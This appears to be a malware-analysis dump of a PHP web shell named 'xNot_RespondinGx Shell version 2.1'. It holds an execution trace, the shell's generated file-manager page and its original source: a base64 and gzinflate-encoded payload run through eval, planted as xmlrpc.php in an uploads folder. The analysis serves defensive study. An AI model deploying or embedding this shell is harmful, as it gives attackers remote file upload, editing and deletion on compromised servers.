3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 73 $id = 2
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i = 0
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 73 $id = 3
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i = 0
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 73 $id = 4
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i = 0
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 81 $i++
4 28 0 0.004114 482792 scandir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 205 1 '/var/www/html/uploads'
4 28 1 0.004170 483416
4 28 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'xmlrpc.php']
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 205 $_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'xmlrpc.php']
4 29 0 0.004226 483432 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/.'
4 29 1 0.004251 483496
4 29 R TRUE
4 30 0 0.004272 483464 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/..'
4 30 1 0.004295 483512
4 30 R TRUE
4 31 0 0.004314 483472 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/.htaccess'
4 31 1 0.004337 483512
4 31 R FALSE
4 32 0 0.004356 483472 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/data'
4 32 1 0.004378 483512
4 32 R TRUE
4 33 0 0.004397 483472 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 220 1 '/var/www/html/uploads/data'
4 33 1 0.004424 483512
4 33 R TRUE
4 34 0 0.004444 483472 perms 1 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 222 1 '/var/www/html/uploads/data'
5 35 0 0.004471 483472 fileperms 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 1 '/var/www/html/uploads/data'
5 35 1 0.004492 483512
5 35 R 16895
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 $perms = 16895
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 298 $info = 'd'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 311 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 312 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 315 $info .= 'x'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 318 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 319 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 322 $info .= 'x'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 325 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 326 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 329 $info .= 'x'
4 34 1 0.004676 483512
4 34 R 'drwxrwxrwx'
4 36 0 0.004698 483472 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 223 1 '/var/www/html/uploads/data'
4 36 1 0.004724 483512
4 36 R TRUE
4 37 0 0.004744 483480 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/prepend.php'
4 37 1 0.004768 483528
4 37 R FALSE
4 38 0 0.004788 483488 is_dir 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 215 1 '/var/www/html/uploads/xmlrpc.php'
4 38 1 0.004810 483528
4 38 R FALSE
4 39 0 0.004829 483472 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/.'
4 39 1 0.004852 483496
4 39 R FALSE
4 40 0 0.004871 483464 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/..'
4 40 1 0.004892 483512
4 40 R FALSE
4 41 0 0.004910 483472 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/.htaccess'
4 41 1 0.004932 483512
4 41 R TRUE
4 42 0 0.004951 483472 filesize 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 1 '/var/www/html/uploads/.htaccess'
4 42 1 0.004971 483512
4 42 R 64
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 $size = 0.0625
4 43 0 0.005007 483416 round 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 2 0.0625 3
4 43 1 0.005029 483488
4 43 R 0.063
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 $size = 0.063
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 248 $size = '0.063 KB'
4 44 0 0.005085 483512 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 255 1 '/var/www/html/uploads/.htaccess'
4 44 1 0.005110 483552
4 44 R FALSE
4 45 0 0.005128 483512 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 256 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.005151 483552
4 45 R TRUE
4 46 0 0.005170 483512 perms 1 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 257 1 '/var/www/html/uploads/.htaccess'
5 47 0 0.005189 483512 fileperms 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 1 '/var/www/html/uploads/.htaccess'
5 47 1 0.005210 483552
5 47 R 33188
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 $perms = 33188
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 292 $info = '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 311 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 312 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 315 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 318 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 319 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 322 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 325 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 326 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 329 $info .= '-'
4 46 1 0.005395 483552
4 46 R '-rw-r--r--'
4 48 0 0.005416 483512 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/.htaccess'
4 48 1 0.005441 483552
4 48 R FALSE
4 49 0 0.005460 483512 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/.htaccess'
4 49 1 0.005482 483552
4 49 R TRUE
4 50 0 0.005503 483512 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/data'
4 50 1 0.005525 483552
4 50 R FALSE
4 51 0 0.005543 483520 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/prepend.php'
4 51 1 0.005566 483568
4 51 R TRUE
4 52 0 0.005583 483528 filesize 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 1 '/var/www/html/uploads/prepend.php'
4 52 1 0.005602 483568
4 52 R 57
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 $size = 0.0556640625
4 53 0 0.005644 483424 round 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 2 0.0556640625 3
4 53 1 0.005668 483496
4 53 R 0.056
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 $size = 0.056
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 248 $size = '0.056 KB'
4 54 0 0.005735 483528 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 255 1 '/var/www/html/uploads/prepend.php'
4 54 1 0.005763 483568
4 54 R FALSE
4 55 0 0.005791 483528 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 256 1 '/var/www/html/uploads/prepend.php'
4 55 1 0.005901 483568
4 55 R TRUE
4 56 0 0.005928 483528 perms 1 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 257 1 '/var/www/html/uploads/prepend.php'
5 57 0 0.005956 483528 fileperms 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 1 '/var/www/html/uploads/prepend.php'
5 57 1 0.005981 483568
5 57 R 33261
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 $perms = 33261
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 292 $info = '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 311 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 312 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 315 $info .= 'x'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 318 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 319 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 322 $info .= 'x'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 325 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 326 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 329 $info .= 'x'
4 56 1 0.006209 483568
4 56 R '-rwxr-xr-x'
4 58 0 0.006230 483528 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/prepend.php'
4 58 1 0.006255 483568
4 58 R FALSE
4 59 0 0.006275 483528 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/prepend.php'
4 59 1 0.006304 483568
4 59 R TRUE
4 60 0 0.006332 483528 is_file 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 242 1 '/var/www/html/uploads/xmlrpc.php'
4 60 1 0.006360 483568
4 60 R TRUE
4 61 0 0.006383 483528 filesize 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 1 '/var/www/html/uploads/xmlrpc.php'
4 61 1 0.006407 483568
4 61 R 4955
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 243 $size = 4.8388671875
4 62 0 0.006452 483424 round 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 2 4.8388671875 3
4 62 1 0.006477 483496
4 62 R 4.839
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 244 $size = 4.839
3 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 248 $size = '4.839 KB'
4 63 0 0.006561 483528 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 255 1 '/var/www/html/uploads/xmlrpc.php'
4 63 1 0.006593 483568
4 63 R FALSE
4 64 0 0.006618 483528 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 256 1 '/var/www/html/uploads/xmlrpc.php'
4 64 1 0.006646 483568
4 64 R TRUE
4 65 0 0.006672 483528 perms 1 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 257 1 '/var/www/html/uploads/xmlrpc.php'
5 66 0 0.006698 483528 fileperms 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 1 '/var/www/html/uploads/xmlrpc.php'
5 66 1 0.006723 483568
5 66 R 33204
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 282 $perms = 33204
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 292 $info = '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 311 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 312 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 315 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 318 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 319 $info .= 'w'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 322 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 325 $info .= 'r'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 326 $info .= '-'
4 A /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 329 $info .= '-'
4 65 1 0.006967 483568
4 65 R '-rw-rw-r--'
4 67 0 0.006994 483528 is_writable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/xmlrpc.php'
4 67 1 0.007024 483568
4 67 R FALSE
4 68 0 0.007049 483528 is_readable 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code(1) : eval()'d code 258 1 '/var/www/html/uploads/xmlrpc.php'
4 68 1 0.007074 483568
4 68 R TRUE
3 15 1 0.007121 483576
2 7 1 0.007140 424600
0.007188 342504
TRACE END [2023-02-13 02:11:31.989129]
Generated HTML code
<html><head>
<link href="" rel="stylesheet" type="text/css">
<style>
@import url("https://fonts.googleapis.com/css?family=Ubuntu+Mono");
body{
font-family: "Ubuntu Mono", monospace;
font-weight: normal;
font-style: normal;
background-color: black;
color:#87CEFA;
}
#content tr:hover{
background-color: black;
}
#content .first{
background-color: #87CEFA;
}
table{
border: 1px #87CEFA solid;
}
a{
color:#87CEFA;
text-decoration: none;
}
a:hover{
color:#87CEFA;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head><body><center><h1><b><font color="#87CEFA" size="8">xNot_RespondinGx</font></b></h1></center>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr><td><center><a href="?dir=&jancok=sumon"> Sumon | </a><a href="?dir=&kill=self">Kill</a><br><br><font color="#87CEFA">Dir:</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</center></td></tr><tr><td><form enctype="multipart/form-data" method="POST">
<font color="#87CEFA">File Upload :</font> <input type="file" name="file">
<input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permission</center></td>
<td><center>Modify</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input type="submit" value=">">
</form></center></td>
</tr><tr>
<td><a href="?filesrc=/var/www/html/xmlrpc.php&path=/var/www/html">xmlrpc.php</a></td>
<td><center>4.839 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="xmlrpc.php">
<input type="hidden" name="path" value="/var/www/html/xmlrpc.php">
<input type="submit" value=">">
</form></center></td>
</tr></tbody></table>
</div>
</body></html>Original PHP code
<?php
/*
xNot_RespondinGx Shell version 2.1
Created By : xNot_RespondinGx
Facebook : fb.com/sontik.sontik5
*/
$xNot = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A";
$xNot2 = "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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($xNot))));
exit;
?>